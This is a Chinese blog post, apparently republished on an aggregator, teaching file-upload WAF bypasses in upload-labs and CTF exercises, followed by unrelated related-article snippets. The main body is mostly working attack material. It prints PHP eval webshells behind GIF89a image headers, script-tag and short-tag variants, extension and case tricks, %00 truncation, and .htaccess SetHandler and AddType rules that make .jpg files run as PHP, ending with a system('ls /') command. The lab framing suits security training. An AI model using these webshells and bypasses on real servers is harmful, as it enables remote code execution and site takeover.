【文件上传WAF绕过】<?绕过、.htaccess木马、.php绕过

🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

文件上传常用waf绕过木马

路径

00截断

1、upload11(GET传参)

2、upload12(POST传参)

.htaccess绕过(apache浏览器使用)

第一种:

第二种:

题目

一、

二、


文件上传常用waf绕过木马

GIF89a
<script language="php">
@eval($_POST['cmd']);phpinfo();
</script>
//校验文件内容
1:校验你内里里面有没有图片头
GIF89a2:校验你的内容 有没有木马格式
<?php eval($_POST['cmd']);?>//以下两种情况上变形校验:
一.校验:内容里面有没有<?
GIF89a
<script language="php">
@eval($_POST['cmd']);phpinfo();
</script>二.校验:内容里面有没有:php
GIF89a
php<?=@eval($_POST['cmd']);三.如果过滤了php后缀
利用phtml
php空格
php.四.文件名大小写绕过
Php、pHp名单列表绕过
php5、php7、php9
.php.rar

路径

../上级目录
./当前目录相对路径
../upload/小马.phtml11.11.10.1:8080/upload/xml/index.php
==>跳转到11.11.10.1:8080/html/hhh/小马.php因为index.php前面有两级/upload/xml/
所以利用:../../**html/hhh/小马.php

00截断

//00截断适用于很多场景,
只要目标没有执行重命名操作,
都可以尝试00截断。小马.jpg改为==>小马.php%00.jpg上传前要把%00给url解码

上传成功:

1、upload11(GET传参)

我们这里老方法,改后缀php,但是发现是白名单,所以这里利用%00截断

利用%00截断

浏览器访问,成功上传

2、upload12(POST传参)

这里是POST传参,

上传成功

浏览器访问,上传成功

.htaccess绕过(apache浏览器使用)

一定要是.jpg文件

第一种:
//指定xiaoma.jpg这个文件
<FilesMatch "xiaoma.jpg">SetHandler application/x-httpd-php  
</FilesMatch>//绕过步骤:
1.先上传.htaccess文件上去
<FilesMatch "xiaoma.jpg">  SetHandler application/x-httpd-php  
</FilesMatch>2.再上传xiaoma.jpg木马文件,
GIF89a
<?php
@eval($_POST['cmd']);
?>3.再点击那个文件名为xiaoma.jpg的发送
就可以利用**upload/xiaoma.jpg**访问上传文件
(http://127.0.0.1/uploadlab/upload/xiaoma.jpg)

重发两个包:发送给重发器

访问这个xiaoma.jpg,上传成功

第二种:
.htaccess内容:
AddType application/x-httpd-php .jpg
//将.jpg文件按照php代码来执行1.首先上传.htaccess文件上去2.然后再上传一个.jpg文件上去
GIF89a
<?php
@eval($_POST['cmd']);
?>然后再用POST的cmd命令执行命令
cmd=system("ls /");

题目

一、

http://teamxlc.sinaapp.com/web5/21232f297a57a5a743894a0e4a801fc3/index.htmlicon-default.png?t=N7T8http://teamxlc.sinaapp.com/web5/21232f297a57a5a743894a0e4a801fc3/index.html

利用%00截断

二、

是兄弟就来传🐎icon-default.png?t=N7T8http://8d9be4fd-86bc-4a71-974b-f758a76a6e5d.node5.buuoj.cn:81/

上传xiaoma.jpg。并抓包,重发两次

.htaccess木马:<FilesMatch "xiaoma.jpg">  SetHandler application/x-httpd-php  
</FilesMatch>

后面就可以成功getshell了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/448333.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

go语言!! 来学习go吧,让我们一起go!go!go!

获取资源&#xff1a;关注公众号&#xff0c;回复&#xff1a;go 背景介绍 Go语言是谷歌推出的一种全新的编程语言&#xff0c;可以在不损失应用程序性能的情况下降低代码的复杂性。谷歌首席软件工程师罗布派克(Rob Pike)说:我们之所以开发Go&#xff0c;是因为过去10多年间软…

linux免密登录的实现

ssh免密登录使用方便&#xff0c;关键没有了口令验证反倒规避了暴力破解或者被探测的风险。配置得当&#xff0c;使用ssh免密登录更加安全。在生产环境中应用和数据库服务器之间互相设置后使用方便&#xff0c;并且在第三方人员配置使用时不用告知对方密码。 第一步、ssh登录发…

【傻瓜式教程】docker运行facechain

首选&#xff0c;为了防止后期docker满&#xff0c;Docker容器 - 启动报错&#xff1a;No space left on device&#xff0c;更换一下docker存储位置 1、停止Docker服务 首先停止Docker守护进程&#xff0c;可以使用以下命令&#xff1a; sudo systemctl stop docker 备份现有…

flask基于django大数据的证券股票分析系统python可视化大屏

证券分析系统采用B/S架构&#xff0c;数据库是MySQL。网站的搭建与开发采用了先进的Python进行编写&#xff0c;使用了Django框架。该系统从两个对象&#xff1a;由管理员和用户来对系统进行设计构建。主要功能包括&#xff1a;个人信息修改&#xff0c;对股票信息、股票买入、…

java学习04 循环高级

一 无限循环 1.for格式&#xff1a; for(;;){System.out.println("循环执行一直在打印内容"); } 解释&#xff1a; 初始化语句可以空着不写&#xff0c;表示循环之前不定义任何的控制变量。 条件判断语句可以空着不写&#xff0c;如果不写&#xff0c;默认表示t…

C++函数分文件编写之VScode版

VScode实现函数的分文件编写 1.下载插件创建项目2.分文件编写内容3.修改主函数文件名 我在分享内容时经常用的软件是VScode&#xff0c;相信有些内存敏感或需要VScode便利性的小伙伴也是更愿意使用VScode。那么接下来我们就盘一盘怎样使用VScode实现分文件编写。 1.下载插件创建…

【lesson6】高并发内存池Page Cache层申请内存的实现

文章目录 Page Cache层的结构申请内存的流程释放内存的流程Page Cache对象结构Page Cache所需要的成员变量Page Cache所需要的成员变量GetInstance()的实现NewSpan()的实现GetOneSpan()的实现NewSpan()的实现 Page Cache层实现的全部代码Common.hThreadCache.hThreadCache.cppC…

推荐收藏!算法工程师面试常考的手撕面试题!

今天给大家分享一些算法工程师技术面试中常手撕的代码。 不管是秋招还是社招&#xff0c;互联网大厂的技术面试中的手撕代码这一部分总是绕不过去的一关。 如果你对这些感兴趣&#xff0c;可以文末找我们交流 手撕 numpy写线性回归的随机梯度下降&#xff08;stochastic gra…

Dash :一个超漂亮的 python Web库!

你好&#xff0c;Dash 是一个非常方便的 Python 库&#xff0c;它可以非常非常帮助你构建基于 Web 的应用程序&#xff0c;而且最棒的是你无需使用 JavaScript&#xff01; 不仅如此&#xff0c;Dash 还是一个专门用于创建分析 Web 应用程序的用户界面库。 如果你是一个使用 …

帮管客CRM 文件上传漏洞

免责声明&#xff1a;文章来源互联网收集整理&#xff0c;请勿利用文章内的相关技术从事非法测试&#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失&#xff0c;均由使用者本人负责&#xff0c;所产生的一切不良后果与文章作者无关。该…

css3 属性 backface-visibility 的实践应用

backface-visibility 是一个用于控制元素在面对屏幕不同方向时的可见性的CSS3特性。它有两个可能的值&#xff1a; visible&#xff1a;当元素不面向屏幕&#xff08;即背面朝向用户&#xff09;时&#xff0c;元素的内容是可以被看到的。hidden&#xff1a;当元素不面向屏幕…

第三百零三回

文章目录 1. 概念介绍2. 实现方法2.1 文字信息2.2 红色边框 3. 示例代码4. 内容总结 我们在上一章回中介绍了"如何实现密码输入框"相关的内容&#xff0c;本章回中将介绍如何在在输入框中提示错误.闲话休提&#xff0c;让我们一起Talk Flutter吧。 1. 概念介绍 我们…